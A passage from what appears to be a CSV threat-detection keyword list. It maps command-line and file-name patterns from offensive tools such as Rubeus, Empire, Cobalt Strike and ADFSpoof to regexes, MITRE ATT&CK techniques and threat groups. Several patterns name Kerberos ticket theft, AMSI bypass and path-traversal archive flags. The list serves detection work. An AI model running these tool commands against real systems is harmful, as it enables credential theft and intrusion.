Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* ADeleg.exe*",".{0,1000}\sADeleg\.exe.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "* --adfs-host * --krb-key * --krb-ticket *",".{0,1000}\s\-\-adfs\-host\s.{0,1000}\s\-\-krb\-key\s.{0,1000}\s\-\-krb\-ticket\s.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "* ADFSpoof.py*",".{0,1000}\sADFSpoof\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","330","57","2024-04-03T11:48:50Z","2019-03-20T22:30:58Z" "* adhunt.py *",".{0,1000}\sadhunt\.py\s.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "* adm2sys.py*",".{0,1000}\sadm2sys\.py.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","9","1","10","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "* admin_persistence_winlogon.c*",".{0,1000}\sadmin_persistence_winlogon\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "* admin-panels.txt*",".{0,1000}\sadmin\-panels\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* AES_cryptor.py *",".{0,1000}\sAES_cryptor\.py\s.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "* afp-brute.nse*",".{0,1000}\safp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-ls.nse*",".{0,1000}\safp\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-path-vuln.nse*",".{0,1000}\safp\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-serverinfo.nse*",".{0,1000}\safp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* afp-showmount.nse*",".{0,1000}\safp\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -AgentDelay *",".{0,1000}\s\-AgentDelay\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -AgentJitter *",".{0,1000}\s\-AgentJitter\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* ajp-auth.nse*",".{0,1000}\sajp\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-brute.nse*",".{0,1000}\sajp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-headers.nse*",".{0,1000}\sajp\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-methods.nse*",".{0,1000}\sajp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ajp-request.nse*",".{0,1000}\sajp\-request\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Alcatraz.exe*",".{0,1000}\sAlcatraz\.exe.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "* All_attack.txt*",".{0,1000}\sAll_attack\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* allseeingeye-info.nse*",".{0,1000}\sallseeingeye\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* amqp-info.nse*",".{0,1000}\samqp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* amsi_disable *",".{0,1000}\samsi_disable\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "* --am-si-bypass=*",".{0,1000}\s\-\-am\-si\-bypass\=.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "* anti_analysis.exe*",".{0,1000}\santi_analysis\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* anti_debug.exe*",".{0,1000}\santi_debug\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* apc_injection.exe*",".{0,1000}\sapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* api_hooking.exe*",".{0,1000}\sapi_hooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* --archive-type tar --mass-find * --mass-find-mode symlinks archive*",".{0,1000}\s\-\-archive\-type\star\s\-\-mass\-find\s.{0,1000}\s\-\-mass\-find\-mode\ssymlinks\sarchive.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "* --archive-type zip --symlinks ""../etc/hosts*linkname"" archive *",".{0,1000}\s\-\-archive\-type\szip\s\-\-symlinks\s\""\.\.\/etc\/hosts.{0,1000}linkname\""\sarchive\s\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "* --Args AntiVirus --XorKey*",".{0,1000}\s\-\-Args\sAntiVirus\s\-\-XorKey.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "* --args whoami*",".{0,1000}\s\-\-args\swhoami.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "* args_spoofing-rs.exe*",".{0,1000}\sargs_spoofing\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* arp.x64.o",".{0,1000}\sarp\.x64\.o","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","0","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "* arsenal-master.zip*",".{0,1000}\sarsenal\-master\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* Ask4Creds.ps1*",".{0,1000}\sAsk4Creds\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "* asktgs * /ticket:*",".{0,1000}\sasktgs\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* asktgs *.kirbi*",".{0,1000}\sasktgs\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* asktgs /ticket:*",".{0,1000}\sasktgs\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* asktgt * /service:*",".{0,1000}\sasktgt\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* asktgt /user *",".{0,1000}\sasktgt\s\/user\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* asktht /user:*",".{0,1000}\sasktht\s\/user\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* asm.py -t * -ln -w resources/*.txt -o *",".{0,1000}\sasm\.py\s\-t\s.{0,1000}\s\-ln\s\-w\sresources\/.{0,1000}\.txt\s\-o\s.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "* asn-query.nse*",".{0,1000}\sasn\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --asrep --domain * --user * --pass *",".{0,1000}\s\-\-asrep\s\-\-domain\s.{0,1000}\s\-\-user\s.{0,1000}\s\-\-pass\s.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "* asreproast *",".{0,1000}\sasreproast\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* --asreproast *",".{0,1000}\s\-\-asreproast\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* --asreproast *",".{0,1000}\s\-\-asreproast\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* --asreproast*",".{0,1000}\s\-\-asreproast.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* ASREProastables.txt*",".{0,1000}\sASREProastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* ASREProastables.txt*",".{0,1000}\sASREProastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 